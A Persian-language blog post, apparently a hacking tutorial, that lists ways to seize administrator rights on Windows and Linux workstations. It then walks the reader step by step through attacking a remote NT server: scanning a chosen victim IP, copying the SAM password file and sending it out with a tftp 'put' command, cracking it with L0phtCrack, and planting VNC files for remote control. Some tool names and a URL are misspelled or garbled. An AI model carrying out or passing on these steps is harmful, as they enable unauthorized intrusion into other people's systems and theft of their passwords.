s.c.i.t

science of computer and infomation technology

s.c.i.t

science of computer and infomation technology

s.c.i.t
تبلیغات
Blog.ir بلاگ، رسانه متخصصین و اهل قلم، استفاده آسان از امکانات وبلاگ نویسی حرفه‌ای، در محیطی نوین، امن و پایدار bayanbox.ir صندوق بیان - تجربه‌ای متفاوت در نشر و نگهداری فایل‌ها، ۳ گیگا بایت فضای پیشرفته رایگان Bayan.ir - بیان، پیشرو در فناوری‌های فضای مجازی ایران
طبقه بندی موضوعی

الف - عمومی ترین نوع حمله روی یک ماشین ورک استیشن به دست آوردن توانایی راهبری (Admin در ویندوز Root در سیستم های اوپن سورس مثل لینوکس) سیستم است.
معمولا در ویندوز ورک استیشن هکرها با تغییرنام (Rename) یا پاک کردن پوشه SAM در آدرس زیر به راهبری ماشین دست می یابند.


C:\ winnt\ system32\ config\ SAM
و در لینوکس با پرامت تحت Lilo و تایپ کلمه Linuxs می توان به توانایی راهبری سیستم بعنوان یک هکر دسترسی یافت.



ب : راه دیگر شکستن کلمه عبور است که معمولا با برنامه های پسوردشکن مثل Lophtcrack (LC) هکر موفق به انجام این کار می شود و در بوت مجدد سیستم به راهبری دسترسی می یابد.
ج : نوع بعدی حمله روی ورک استیشن سرقت هارد ماشین و قراردادن آن روی یک رایانه دیگر در همان مجموعه یا جای دیگر است که به همین راحتی اجازه سرقت اطلاعات بدون نفوذ از راه دور را می دهد.
معمولا سازمانهای بزرگ که دیتاهای حساس را روی شبکه نگه نمی دارند هزینه زیادی برای حفظ امنیت فیزیکی ورک استیشن های خود می کنند تا بند را آب ندهند.
د: آخرین نوع حمله روی ورک استیشن اجرای کامندها و دستورات خاص هنگام Login کردن به سیستم و یا سوء استخراج کردن فایل ها (Exploiting files) است تا بوسیله آن به سیستم از طریق فیزیکی دسترسی یافت.
یک راه بسیار حیاتی اضافه کردن یک user یا اسم کاربری به سیستم از طریق دستورات ادیت در رجیستری است که بوسیله آن می توان بدون داخل شدن به سیستم از طریق Regedit یک اسم کاربری در حد راهبر ساخت و وارد آن شد.
راه دیگر دسترسی به لیست برنامه های مشترک میان کاربران در شاخه زیر است:


c:\ Document and settings\ All users\ start menu\ programs\ startup



عینک آفتابی فراموش نشود. سیستم خود را که ترجیحا ان تی است بالا بیاور و با آن به اینترنت وصل شو. حال ، دنبال یک آی پی قربانی بگرد که آن نیز ان تی باشد. به راحتی با برنامه های اسکنر می توانی شماره آی پی یک سایت را با دستور Ping روی داس به دست آوری. حالا آی پی را وارد اسکنر مثل languard کرده و ok کن تا بفهمی سرور طرف ان تی است. با مطمئن شدن حالا در مرحله بعد باید بدانی که فایل به نام sam روی ان تی است که کلمه عبور هر چقدر هم بزرگ و طولانی باشد روی آن ذخیره می شود. بنابراین باید فایل sam را در ابتدا بشکنی. این فایل روی آی پی و سیستم قربانی (ماشینی که بدان حمله می شود) وجود دارد. اما برای انتقال sam فایل سیستم باید بتواند با برنامه tftpکار کنید. این برنامه را براحتی می توانید از روی اینترنت با جستجوی آن در گوگل با تایپ tftp32 پیدا کنید. سپس آن را روی سیستم خود نصب کرده و 2دستور زیرا را اجرا کنید : Copy C:\winnt\repair\sam C:\sam tftp-i IP.IP.IP.IP Put C:\sam حالا فایل sam سیستم قربانی روی ماشین شما می آید. در مرحله بعد باید این فایل sam را به نوعی درون شکنی کرده تا کلمه عبور کد شده را از آن بیرون بکشید. برای این کار بهترین روش دانلود و نصب برنامه ای به نام I0phat است که به راحتی با راه اندازی آن و قرار دادن فایل sam داخل آن می توانید به کلمه عبور دست یابید. اوکی ! اکنون زمان ستاپ کردن برنامه VNC است. باید یک کپی معتبر از این برنامه پیدا کنید که البته از سایت زیر می توانید آن را برداشته و روی سیستم خود نصب کنید: http://www.uk.resarch.att.com/Vnc/download.html (برخی از کپی های موجود خود یک سارق حرفه ای به شمار می رود). شما به 3فایل تحت نامهای زیر احتیاج دارید : Winvnc.exe Vnchooks.dll omnithread-rt.dll از کجا این فایل ها را به دست آوردید؟ خوب معلوم است از روی برنامه VNC که روی سیستم خود نصب کرده اید. اوکی ! فایل omnithread-rt.dll را درون شاخه Winnt\system32\directory\ و 2 فایل دیگر را درون شاخه Winnt\system32\Viewers\ قرار بدهید.

  • امیر محمد یوسفی

هک کردن